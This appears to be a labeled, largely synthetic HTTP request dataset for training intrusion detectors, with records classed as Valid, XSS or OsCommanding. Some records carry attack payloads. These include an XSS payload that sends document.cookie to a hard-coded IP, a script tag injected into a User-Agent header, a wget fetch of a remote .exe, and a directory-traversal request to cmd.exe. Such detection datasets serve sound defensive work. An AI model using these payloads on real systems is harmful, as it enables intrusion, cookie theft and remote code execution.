Warning: 078 4.18.109.190 "qceetbhebMca6" "Wed, 01 Aug 07 08:37:44 CET"
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 7399609
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20701
Start - Id: 48129
class: XSS
GET /s5t4s2bMoC-csi80DQ/Xv0pIoptWRQioN/rxb.cfm?r5EtDurluudt=4550784621&f7qiesotrq=3652&earlrwd=eZxUJ2&hewoae=16&eoxikeVedtlaaI=ph+so%26sg78e&yasuexpe9lnn=php%7Edbtmp&WBhorV4Cwtlogueval=mDww2yWu&A3varbTW_DU=scriptnulluuc%5Cdy&qbeqo=+Ipi&2eobpOSelEc=61&H6vNjA_6HpBA=o%3D1b%5BErc%5C8&ea1codtsesis3t=ttmtIieOnwac%28e&eel1y4x6uuh9x=javascript%3A++++alert++%28%22+fa927e.bcca%22%29&eaoo=78816020 HTTP/1.1
Host: 23.42.195.7
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 94.244.224.171
Cookie: Lstdin1S7RPkC=tli4es
Cookie2: $Version="2"
Date: Fri, 01 Apr 05 20:02:35 CET
ETag: W/"RdKDdWmzVeSfgJG3"
Expect: hdZrwa
From: odallu0e@nalp.cz
If-Modified-Since: Sat, 06 Nov 04 06:27:25 GMT
If-Unmodified-Since: Fri, 28 Jul 06 24:37:01 CET
If-Match: *
If-None-Match: "I5aF0Yt8Q5GmECYy_"
If-Range: Sat, 24 Nov 07 07:18:40 CET
Max-Forwards: 28
MIME-Version: 3.4
Pragma: eds=euro
Proxy-Authorization: Digest realm
Authorization: fNss o6se=C22aan
Range: 2-92,159872-,109519-
Referer: /naezn6i/aovtql/s2Tsdpi/rs5E.tar.gz
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.6 (X11; U; Open BSD i386 4.9; be-al; rv:9.3.5) Gecko/82988592
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2048x2568
Via: FTP/8.7 www.5ueaa.jpeg, HTTP/4.5 227.81.84.77
Transfer-Encoding: deflate
Upgrade: 1ld/1.5, ec6b/0.1, A7r/0.6, peeQ/2.5
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48129
Start - Id: 11140
class: Valid
GET /0jguyysAh4Kkanh.msf?2e=emeta&ghJfeJeswClbftu=51708&sh1war28oolab=57&de4rini7pihen=aRo&eOR=07255360&8ekcf=ceus&gtioh6rAt=dsR-T.bazjq&ebrszte2ccoeb=tIfq-YbR&it7ea9iof=30&eaArrloea=6 HTTP/1.0
Host: 219.187.103.92
Connection: keep-alive
Accept: text/*;q=0.2, application/*, audio/*;q=0.3
Accept-Charset: windows-1250, windows-1250;q=0.4, iso-2022-kr, x-mac-arabic;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: 1sadJdhe-etehotis
Cache-Control: max-age=6007
Client-ip: 69.250.219.64
Cookie: exec14GGyESYBv=1830;C9CdeleteoICHposition1=Ewen=
Cookie2: $Version="3"
Date: Wed, 21 Mar 07 01:12:02 CET
ETag: W/"4E6Sz89.qjbnVEhPx_"
Expect: lcmHur=Ljsl
From: ennrag@twcq1u2Mi.org
If-Modified-Since: Fri, 24 Aug 07 12:23:10 GMT
If-Unmodified-Since: Wed, 19 Oct 05 09:32:54 GMT
If-Match: *
If-None-Match: "hUMzIcJRtd75Lk1"
If-Range: "hCNCR0wgfGh4gVdHn"
Max-Forwards: 05
MIME-Version: 9.1
Pragma: mrrm='a0'
Proxy-Authorization: Digest response="FF6f55D1baDeb6c2C872bb57B9eB0aDd"
Authorization: NTLM RWlqblNSc25haGxxbmZ1aU5kZWE5dHRyeHNzeGVlbmt0cA==
Range: 5-671745,5852-9861
Referer: http://noy6am2a.uk/trUsp/tb8feor/tpaenhto.cfm
TE: gzip;q=0.5
Trailer: Transfer-Encoding
User-Agent: thfarrt
UA-CPU: 68000
UA-Disp: 8419,120,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 571x624
Via: FTP/6.7 110.154.232.69, 1.0 246.191.197.224, 5.7 www.roUs42nd.html:0
Transfer-Encoding: identity
Upgrade: hgrW/3.1
Warning: 864 51.124.226.139:114 "jlvcgsocjhnvs" 
X-Forwarded-For: 207.202.183.212
X-Serial-Number: 06776910679420292948
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 11140
Start - Id: 21500
class: Valid
GET /p7yjfse6i/1HueDPVscriptVG/Pdaorrnn7btoenl/sy25e/hPFFY/to5E.W8/folaoyiorsmpnDt2bE/lCheyrTzC.css?Espaohinco=61466649&6edoeco=eeIetOiaeq&gpeh=4ac9H&Ftmyeds5=aAi%3C%7C%40nnaEoe HTTP/1.0
Host: www.goraetul.st
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.5, iso-8859-1, x-mac-roman;q=0.6, x-mac-roman, us-ascii
Accept-Encoding: deflate, compress
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 31.224.188.26
Cookie: dutfwnyoaooss=rzmidiwsvlu ti 
Cookie2: $Version="185"
Date: Wed, 17 Jan 07 05:35:46 CET
ETag: "OjvcqtoKxqm_f3Sr4"
Expect: 100-continue
From: 8whhees@Oeeq.net
If-Modified-Since: Mon, 03 Sep 07 14:27:28 UTC
If-Unmodified-Since: Sun, 14 Mar 04 14:16:50 CET
If-Match: "eZ7ygZSQSZnMtjg"
If-None-Match: "EyMBSgUGwr3DbX0T9"
If-Range: "-sYKR7A9EzfdHmkbWpy"
Max-Forwards: 82
MIME-Version: 4.1
Pragma: irelqa0m='v'
Proxy-Authorization: NTLM ZUFlc2hncG5tZjZvMHNkcnRkdHNkWGluMWVrZWlkdHlzc2VuYg==
Authorization: Digest username="lztX"
Range: 8137-,-4
Referer: http://M5tnOri.net/euts8Rla/tsvA/orrdesin/ltwre.mdb
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: o1hna/6.2
UA-CPU: x86
UA-Disp: 130,178,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 7753x3387
Via: HTTP/4.4 220.250.217.97, FTP/4.6 131.163.56.10
Transfer-Encoding: gzip
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 278 www.noeiu.jpg "ddshudlt" 
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21500
Start - Id: 27837
class: Valid
GET /liwsdTtoqh/efWPYpYj7kZlxE0BSRc/teurDmoS/b.Pl/fzJtTfmce5ufS2VtNYob/oxo@LQdWZr/oss/f@EOFktoRm1sCvbnNpX4.sh?yC1LaGoJXC=ilg+execionmememc%5DMetdiv&ehiuieaudraen6=nlog HTTP/1.1
Host: 21.54.29.99:9914
Connection: rMin
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: uoud7Or4-nkdnhYB, s9m9ft-5Csibb, l-s, 3dt7nr-sag;q=0.2
Cache-Control: rehetgey='rwrph'
Client-ip: 195.88.135.206
Cookie: Hpe=nm4neaeosmeuit;ee6t3wto0nlogh=rLju8sxToaJ.;t0sAktu=nvhfopent~n;ea9MH6LoD=561451;owh8hkrinragds=3edlr;dlhtxt17eecdco=4neoueaaritnoBr
Cookie2: $Version="9"
Date: Mon, 21 Dec 09 01:18:40 UTC
ETag: "T7R-PajXniYdaIVIMa"
Expect: 8tetwTas
From: xalea@r7nedo.fr
If-Modified-Since: Mon, 07 Sep 09 08:30:36 CET
If-Unmodified-Since: Thu, 14 Feb 08 14:13:28 UTC
If-Match: *
If-None-Match: "NWzEOx6J2frU.S6y"
If-Range: *
Max-Forwards: 75
MIME-Version: 9.1
Pragma: itEs1='ser'
Proxy-Authorization: rrhv teeapa0=ahtafwd
Authorization: NTLM Z25oNFRlOXN1bnVpeW1Od3VsZXdvcGlsbko0bzRpSHI=
Range: -858224
Referer: /fioW.wmn
TE: trailers,trailers,gzip;q=0.9
Trailer: Range
User-Agent: no5b (auBlJ6T@zQ; rbE7ial4; lwcu9y; qENz0I3l)
UA-CPU: x86
UA-Disp: 904,456,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 277x778
Via: 5.5 www.aQena.tiff:5596, oiaue/0.6 241.248.53.155, 1.7 www.omtete.png
Transfer-Encoding: t44e4
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 27.223.128.62
X-Serial-Number: 92325368257
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 27837
Start - Id: 20272
class: Valid
GET /7dqn3ce/KMdzDandwp-/oaEcewEt/ioaesnutl0S/selc.php?ho4axDhrn=270854&7dligN=5wouoiwwOlTeaeseht&tes8esidpqiei=mToee7Weoijnvs HTTP/1.0
Host: 54.176.155.143
Connection: close
Accept: audio/basic;q=0.8, text/*
Accept-Charset: windows-1257, x-mac-chinesetrad, ks_c_5601-1987;q=0.4
Accept-Encoding: 
Accept-Language: rasdTm-atUeoc;q=0.2
Cache-Control: min-fresh=10
Client-ip: 102.229.160.142
Cookie: rllanx5st1Siha=0684610;tJVV=otraygb%uir%allhcat
Cookie2: $Version="235"
Date: Thu, 12 Nov 09 04:27:17 CET
ETag: W/"GaGJnzog2Z7mqcrS0jW"
Expect: 100-continue
From: OolLe3@sxRs.net
If-Modified-Since: Fri, 20 Oct 06 16:26:11 GMT
If-Unmodified-Since: Sat, 25 Jul 09 08:15:16 CET
If-Match: "vITy0eGh_sBNph6S-h"
If-None-Match: *
If-Range: Fri, 22 Jul 05 18:45:28 GMT
Max-Forwards: 561
MIME-Version: 1.5
Pragma: it=egOsew5e
Proxy-Authorization: NTLM Y25lYWFlZXJybjZHZXNkYXRzY21ld2VvZG5zOHVhaGRseGVmZWVodGd3c29lbA==
Authorization: gfwy tgweron=eEmacjp
Range: 2-254176
Referer: http://lpsnttsi.com/HengwOk.php
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: eansenTje/3.9
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: FTP/4.2 www.t3anhels.shtml:40904, rstoA/9.7 www.Ssyna.js
Transfer-Encoding: compress
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 058 www.eyes9l.tiff "iseRqeh6t" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20272
Start - Id: 19129
class: Valid
GET /sRlPrvnYkJ.aspx?zeAmame=9&tsoismsvinqres=hdheCeebetweenth9sd HTTP/1.0
Host: www.LchEn8ers.net
Connection: nricfgr
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, identity
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 250.159.224.244
Cookie: thuStEni=oZ0CWU1d0fYa;ievAln=trm;iatr9nnmrf4i=osgzotTId;qCloqose2LNwgfw=zttFs0K
Cookie2: $Version="13"
Date: Sat, 16 Jun 07 18:02:04 GMT
ETag: "C7KMcbYdDApxBJuC"
Expect: dOejntel
From: eono6e9@e4noq.fr
If-Modified-Since: Sat, 01 Nov 08 06:51:29 GMT
If-Unmodified-Since: Fri, 01 Sep 06 19:53:24 UTC
If-Match: "eYVSMY4Bci3.ZZC9@n"
If-None-Match: *
If-Range: *
Max-Forwards: 38
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest uri=http://rhDeEzl.com/8Sfrs8nS.tiff
Authorization: NTLM YmxsdHNjYXNzZmR0ZHJpYVRhcml0TnRycm9nYW5lYkVucWV3ZXU=
Range: 83457-7
Referer: http://leieI.ch/OiEsSdv/eejagy/hstz.php3
TE: trailers
Trailer: Warning
User-Agent: Mozilla/9.9 (X11; U; Unix 9.2; le-cl; rv:7.1.1) Gecko/77644959
UA-CPU: x86
UA-Disp: 531,060,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 047x447
Via: 8.8 145.64.230.176
Transfer-Encoding: identity
Upgrade: acA9M/5.5, taudh/0.0
Warning: 335 www.ekmeiB.jpg "0lne" "Wed, 30 May 07 03:16:49 UTC"
X-Forwarded-For: 168.136.167.141
X-Serial-Number: 17156015
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 19129
Start - Id: 47375
class: XSS
GET /ba6hqW/p_ZLW/grtm7lsira/rM1bme/apiea/af/iuzKSvZ1F-5cv.rN./hXdo.asp?1htaccesivept=%3Cxml+++id++++%3D+++%22++X+++%22+%3E%3Ca+%3E%3Cb+%3E%26lt%3Bscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F149.75.94.92%2Foras.aspx%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb++%3E%3C%2Fa++%3E%3C%2Fxml+++%3E HTTP/1.1
Host: www.keml.fr:80
Connection: da22t
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oa-h, sisroeeh-iloin, qsnn-e9, cfaaw-wO5s, n-guds
Cache-Control: no-store
Client-ip: 61.200.67.223
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="004"
Date: Tue, 10 Jun 08 11:18:20 CET
ETag: W/"NA8a_48433hVq_f"
Expect: oloi
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sun, 11 May 08 19:33:04 CET
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: *
If-Range: "abnUN9N._FJgAOiCT"
Max-Forwards: 6
MIME-Version: 2.6
Pragma: msslsc=x4
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Basic ZGFjdGV0MTplc2hlY0k=
Range: 35419-,75138-2674,165640-
Referer: http://www.slunr.ch/essorovl.cgi
TE: deflate,gzip;q=0.2
Trailer: Range
User-Agent: 3iecjb5iceii
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 5.1 www.afOraAo.tiff, FTP/6.7 www.sRswaoe.png
Transfer-Encoding: gzip
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 167101888
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47375
Start - Id: 21604
class: Valid
GET /fettb2Mrmar/cJph/sjsai08tume78/ttcrbewhfae7eh/nyeehjdSzi/iRi.uHQ-kbg9tfAs.jpeg?o1ckMHeeZp=kt%3FDxonrfrhli%3Ftmmch&NshkfnNNudno4e=eO4s&C.CDddmetaDnS7e=anob0d+ei2sengio%3F%5C&aR0dbovirrynhN=le%5C%3F%3FamxaEoD%2F%24&uRy=%29ri&phpGHi=otL1a&fp77a=df5rm&eoOy4ks=0969549&2sidEieit=hdNeanetibaueTe&edlasuxeSsydb=bpxa3wgeSrjA&qoe=5537&EM2kzpopenro=44&aaoemreeC=clQ2j__&syo1dtbeecge=jTHhys+heceriym&htgfrnDs=llnnr HTTP/1.1
Host: www.i6rt.it
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: koi8;q=0.1, utf-7;q=0.5, ks_c_5601-1987;q=0.5, iso-8859-7, x-mac-roman
Accept-Encoding: identity, compress, gzip;q=0.7, gzip;q=0.0, deflate;q=0.6
Accept-Language: Der-q9iemeo;q=0.9
Cache-Control: max-stale=1419
Client-ip: 125.106.235.5
Cookie: ymrva1apgse2cIi=eNnmwindow.openo;allehn2wx=ait<sr6Spfnnx;a5lgcLfahj=i3mxoelhsdsdtn=y1e;fr6mMataf8Tib=601818
Cookie2: $Version="73"
Date: Sat, 28 Aug 04 15:17:52 GMT
ETag: "K9aD7ZQgnxoDv9t"
Expect: 100-continue
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Sat, 23 Jan 10 11:43:50 CET
If-Unmodified-Since: Thu, 04 May 06 08:49:50 UTC
If-Match: "RQwlunCKRo6DNEPw0z"
If-None-Match: "8AvGYi0q_zeCaZHF34b"
If-Range: "0WqLgNRzT1pd.ICivE@"
Max-Forwards: 04
MIME-Version: 1.9
Pragma: ei4ydsE='liti'
Proxy-Authorization: Digest uri=/onIn.png
Authorization: Digest nc=7e4beEDa
Range: 74322-,-826
Referer: /slmuli.swf
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.6 (X11; U; Linux i386 9.1; ho-3a; rv:4.4.8) Gecko/41386130
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 592x4496
Via: FTP/9.2 3.215.81.247
Transfer-Encoding: identity
Upgrade: 4erenr/4.2, dJoBc/5.1, ohere/8.1, 9Ut/5.9
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 12.32.11.193
X-Serial-Number: 0418048557333038
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21604
Start - Id: 43265
class: OsCommanding
GET /3d90uemnP/eGuSBw@p7nd68aYM/eovt/rtpZ51Vz6vm6zriB5Vb/ito/bPKYAjle0S/tgrf.YLD1-/adBqGz2K-7/smeIoaiaieHoHmn.gif?1amtiiettn=Ais54E&JdmYX.=tete&rcirabh=%5Cn+++wget+http%3A%2F%2F148.196.241.194%3A2016%2Fnftp.exe HTTP/1.1
Host: www.enee.gov
Connection: keep-alive
Accept: text/*;q=0.1
Accept-Charset: *
Accept-Encoding: compress;q=0.6, identity, identity;q=0.0, identity;q=0.0
Accept-Language: aoin-bXt, sss-Rsroaeon, sasstrj-hat4g4c;q=0.6
Cache-Control: only-if-cached
Client-ip: 116.247.114.110
Cookie: fN2tJ0oupdateYwh-=q;epxhSp7qrw7=adminc9n+t;k8NU21YHmFKwhere=1627
Cookie2: $Version="54"
Date: Mon, 11 Sep 06 22:08:00 GMT
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Thu, 30 Apr 09 08:04:16 CET
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: "3wHsDmCKe@D3oXCdyoo"
If-None-Match: "kM.0C@TK9XLxfleixvg"
If-Range: *
Max-Forwards: 273
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: ahl7bk igiat=hita
Range: -640387
Referer: /A43o/5trjotwr/i1pgvEs/ecvnmrs.php3
TE: trailers,trailers,chunked;q=0.1
Trailer: Via
User-Agent: 9etan/1.4.9.8.1
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 842x6548
Via: FTP/6.5 www.eceeee.tiff, HTTP/7.8 www.dsset1ul.js:1690, tdt3/9.0 148.199.247.97
Transfer-Encoding: GEtztr; erelOo=e5VsE
Upgrade: lnphe/4.9
Warning: 800 46.120.121.199 "foFemwrttiu2" 
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 553121190182203403
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43265
Start - Id: 17764
class: Valid
GET /tEgoatt3h3vetrGtntin/mJ@tDVAfFWwvM9FSYZNm.asp?Iatz9J=iecho&3Dde=l+w1o2 HTTP/1.0
Host: www.teosuh.de:8
Connection: zoat
Accept: */*;q=0.6
Accept-Charset: isiri-3342;q=0.0, x-mac-turkish, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 28.227.18.202
Cookie: 8jBqhttpRe=ttEsishxiesgn2;efan6nchTc=492
Cookie2: $Version="6"
Date: Thu, 17 Mar 05 05:01:14 UTC
ETag: "edr_vKqPDo9AhhSxQ9vu"
Expect: 100-continue
From: 0D8aoioi@bieedfc.uk
If-Modified-Since: Fri, 22 Jul 05 05:53:27 CET
If-Unmodified-Since: Mon, 11 Apr 05 18:13:29 CET
If-Match: "gcXcZEsc1pc-a.Pmu"
If-None-Match: *
If-Range: Wed, 06 Oct 04 08:30:30 UTC
Max-Forwards: 5
MIME-Version: 5.6
Pragma: e=eoEux2
Proxy-Authorization: Digest username="ldobnen"
Authorization: ruas uhue=be0ite
Range: 27-
Referer: /rsrq/yNhabys/pnsieyrT/CeIti/Ta3Ntq.shtml
TE: trailers,trailers,gzip;q=0.7
Trailer: Expect
User-Agent: Mozilla/5.2 (compatible; MSIE 6.4; Win 9x; bsdg)
UA-CPU: x86
UA-Disp: 192,3054,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 582x198
Via: 8.9 99.227.108.219, HTTP/8.1 www.Ouaae.jpg, 7.1 www.8y7ey3d.css
Transfer-Encoding: gzip
Upgrade: ZHn/3.1
Warning: 923 www.tcRf.css:85831 "OacwtAoru" 
X-Forwarded-For: 105.19.29.209
X-Serial-Number: 197606037
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17764
Start - Id: 14446
class: Valid
GET /z9/5openM4execA2VKM-JlWV/MCM/qOaery1ooaemaaey.jsp? HTTP/1.0
Host: www.huAevhetdf.biz
Connection: keep-alive
Accept: image/jpeg;q=0.9
Accept-Charset: cp-936;q=0.8, iso-2022-jp
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 255.146.199.17
Cookie: RBw7Y=tiaihs0nc;dsiesbie=DsaRe;onsx8aoNIts0m=99717543
Cookie2: $Version="15"
Date: Fri, 10 Aug 07 08:03:51 UTC
ETag: "LP9hdv0ROyxSDSQ0Q"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Mon, 02 Jun 08 22:52:01 GMT
If-Unmodified-Since: Thu, 08 Jun 06 24:34:24 UTC
If-Match: "qTAMkO9ZMrqDareTGRBI"
If-None-Match: *
If-Range: Fri, 14 Oct 05 06:19:41 CET
Max-Forwards: 924
MIME-Version: 2.3
Pragma: ltRehhso='txetea'
Proxy-Authorization: oa7d0 neletwg=tdqaeth
Authorization: Basic cm5Hcm5zcjphcnRyY3Rh
Range: -517,627-,587-701
Referer: http://www.ohEalwn.org/pi9d/s3hyroh/fueifa3/oOr3/dRao.gif
TE: gzip;q=0.9,deflate;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/2.0 (X11; U; SunOS sun4u 8.9; se-Uo; rv:5.2.5) Gecko/38126582
UA-CPU: 68000
UA-Disp: 3006,633,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5927x518
Via: HTTP/3.9 246.65.10.128
Transfer-Encoding: Sn4Te; o6olaweo=zelney2s
Upgrade: nen/1.1, Bsb/4.0, Nijin/7.5
Warning: 990 www.n3Met.jpeg "edoEbbedhymE8" "Wed, 21 Nov 07 03:10:58 GMT"
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 505939828971
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14446
Start - Id: 36572
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 98.32.239.26
Connection: close
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: deflate;q=0.2, identity;q=0.2, gzip;q=0.6
Accept-Language: *
Cache-Control: no-store
Client-ip: 255.76.112.78
Cookie: h6=l=\
Cookie2: $Version="139"
Date: Wed, 03 Feb 10 16:17:09 UTC
ETag: W/"g8bltgAKXO5Z5rPL@p"
Expect: t4lai=ttegsbtg;8sil
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 17 Nov 08 14:52:38 UTC
If-Unmodified-Since: Sat, 06 Jun 09 15:46:16 GMT
If-Match: "f82VsZpd.HZDE.qc"
If-None-Match: "kJfKZrr81wD7@7S"
If-Range: Sat, 18 Oct 08 14:32:26 UTC
Max-Forwards: 2316
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: tcpfic reesTpr=hh3orhdh
Range: -961935,910376-
Referer: http://www.ptkc4o.com/rieO9/n6e7/it2sr/dnnjats.tar
TE: trailers,gzip;q=0.4,gzip
Trailer: If-Match
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 1.8; ae-en; rv:1.6.9) Gecko/19576326
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 529x915
Via: FTP/6.9 www.iodn.jpeg:866, 0.4 www.scCgn.jpg, 7.8 128.65.84.117
Transfer-Encoding: compress
Upgrade: t2w5X/9.8
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 33496662681000
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36572
Start - Id: 46642
class: XSS
GET /lsm2/yoxmea2tteatnwwnrh3d/rmA2a/tRk/KAVMCSj-ThperlsZK/i1aiaefhazEbnk9/qfhlttaWsTsatatv/hjq3bAY2NZNP/i6TgVk..png?OflpOkfestltr=ekm&tmAG76u3HY=in%3Efonk&gfd8asS=747&si04tuhA7llo=xoeooede&catUFP=i2alngaa&7gss=6nrSroy6fjT4 HTTP/1.1
Host: www.hlte.st:80
Connection: nhteg
Accept: video/*, text/*
Accept-Charset: x-mac-arabic, windows-1254;q=0.0, macintosh
Accept-Encoding: identity, identity;q=0.1, identity;q=0.9, compress;q=0.5, deflate
Accept-Language: hhlyai-h5rVtnm, mrT-eTpat;q=0.8, b-edreofX;q=0.3, mdecAq-c0edTab;q=0.4
Cache-Control: max-stale
Client-ip: 173.63.25.136
Cookie: osoI89=acceptcEtasuue;onlFqxaan=5N0b;od6turaiVstjw=88950
Cookie2: $Version="007"
Date: Sat, 10 Jan 09 18:18:18 CET
ETag: "Eur9H_NKXYCh-Wi0X"
Expect: d6ab
From: sqse@lEf8iTe.it
If-Modified-Since: Wed, 17 Mar 10 03:13:05 GMT
If-Unmodified-Since: Mon, 14 Jun 04 13:27:06 CET
If-Match: *
If-None-Match: "kGlFGGOKiGqKOr-TUrgH"
If-Range: Fri, 20 Jun 08 12:18:38 CET
Max-Forwards: 59
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic YW9kdFRlZTpjY2Vs
Authorization: Digest nc=ba24d2A6
Range: 118-482,-132
Referer: http://www.dMnsAoe.de/adaatts/n1dor.mpg
TE: trailers
Trailer: Via
User-Agent: &<script >[alert    ('tnsd');]</script   >
UA-CPU: PowerPC
UA-Disp: 5349,685,16
UA-Pixels: 4819x5235
Via: ehLerY/1.6 84.38.170.152:74, FTP/6.9 www.em5r.html, orie0/5.1 50.201.58.124
Transfer-Encoding: compress
Upgrade: Ecza/9.5
Warning: 757 108.116.185.191 "ocitEnelehtRjoDnesur" 
X-Serial-Number: 4075489
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46642
Start - Id: 26655
class: Valid
GET /uhVmatxewuhTuNiI9nSe/AhKgG50Nnetcatnph-ZO.nsf?e1arbaTSiSz3t=ieGScVbJov&n4=rhaving&clXiesTtepte=qtrtasar+WTi&srs=T+%3F&jksape=iZg%24&r5tEi=rc49I6&ldnoa9aozaug=eodcbliut&iftp70tqsrsa9=3723549713 HTTP/1.0
Host: 52.225.161.252
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9;q=0.1, isiri-3342, euc-tw;q=0.4, windows-1255;q=0.2, koi8-r
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 163.222.128.3
Cookie: LhToi277=907481;5iframeRz=2493725;EFmochaPPaqNpc=197335;swbj=echo$ ;-onHAevalSzdinC6=88326;ygsesiphloa=cYiour
Cookie2: $Version="43"
Date: Thu, 23 Aug 07 10:05:50 CET
ETag: W/"sCWd9J6@y1dr6qNtBNG"
Expect: 100-continue
From: aenrotes@hoereselr.be
If-Modified-Since: Wed, 10 Mar 10 03:42:40 CET
If-Unmodified-Since: Mon, 05 Apr 04 08:41:17 CET
If-Match: "M4JXK7YSw2LJe.T2Y.x"
If-None-Match: "2beWEYbelAVhR35w"
If-Range: *
Max-Forwards: 23
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic YmtpYnM6MWlzbkdl
Authorization: Basic dDdkenA3OmRlMmg=
Range: 476-058360,016619-,1617-2115
Referer: http://o5dp8p8.be/deou8AU/tenbopae.sh
TE: chunked;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/1.0 (X11; U; Open BSD i586 5.2; no-tb; rv:3.0.8) Gecko/63927245
UA-CPU: PowerPC
UA-Disp: 080,9861,16
UA-OS: Win98
UA-Color: color32
